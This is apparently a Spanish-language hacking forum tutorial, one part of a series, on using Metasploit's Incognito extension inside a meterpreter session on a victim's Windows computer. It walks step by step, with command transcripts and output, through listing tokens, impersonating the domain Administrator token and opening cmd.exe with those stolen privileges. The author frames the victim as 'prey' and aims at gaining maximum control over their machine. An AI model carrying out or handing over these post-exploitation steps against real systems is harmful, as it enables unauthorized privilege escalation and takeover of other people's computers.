+Temario
-+¿Que es incognito?
-+¿Para que funciona?
-+¿Para que nos sirve esto?
-+Lanzando incognito
-+Tomando la token del administrador
-+Lanzando cmd con los permisos de la token adquirida
-+Analizando 'execute -f cmd.exe -i -t'
-+Conclusion:
- Bueno ahora vamos a jugar con alguna presa
que tengamos online una vez que lograr tener una
session en su ordenador podermos hacer muchas cosas
como saben y ya vismos.
Ahora les enseñare a usar incognito
- Incognito es un aaplicacion desarrollada por metasploit
y que hace timepo la colocaron tambien en la shell
meterpreter.
- Incgnito nos permite copiar los tokens de algun usuario.
Explico mejor para que entiendan en un shell los tokens
son lo mismo que las cookies en un navegador.¿Ya entendieron?
- Esto nos sirve para poder mover, borra, copiar, cargar cualquier cosa
que queramos en fin para que no nos salga eso de que no tenemos
permiso suficiente.
- Bueno vamos ver como lanzarlo y sus opciones.
Código: Seleccionar todo
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > help
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter >
- Veamos que tokens hay disponibles ...
Código: Seleccionar todo
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
SNEAKS.IN\\Administrator
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
- En este caso tenemos las tokens de administrador disponibles
y bueno recordemos que despues de cojer un token
hay que comprobar el USERID lo podemos lograr usando en comando
getuid
- Bueno ahora vamos a cojer la token de esta forma...
Código: Seleccionar todo
meterpreter > impersonate_token SNEAKS.IN\\Administrator
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
Server username: SNEAKS.IN\Administrator
meterpreter >
- Y despues de hacer esto nos van a dejar usar una shell
con esta cuneta individual con este comando ('execute -f cmd.exe -i -t')
- Bueno vamos a lanzarla...
Código: Seleccionar todo
meterpreter > execute -f cmd.exe -i -t
Process 3934 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3890]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
SNEAKS.IN\administrator
C:\WINDOWS\system32>
- execute -f: Indicamos a meterpreter que lanze cmd
-i: Nos deja tener contacto con la pc de la victima
-t: Indicamos que use los privilegios que obtuvimos con incognito
- Bueno ahora vimos mas metodos para tener el mayor control
posible sobre un ordenador, se que en algunos casos les sera
muy util a muchos y bueno esperen la parte X Saludos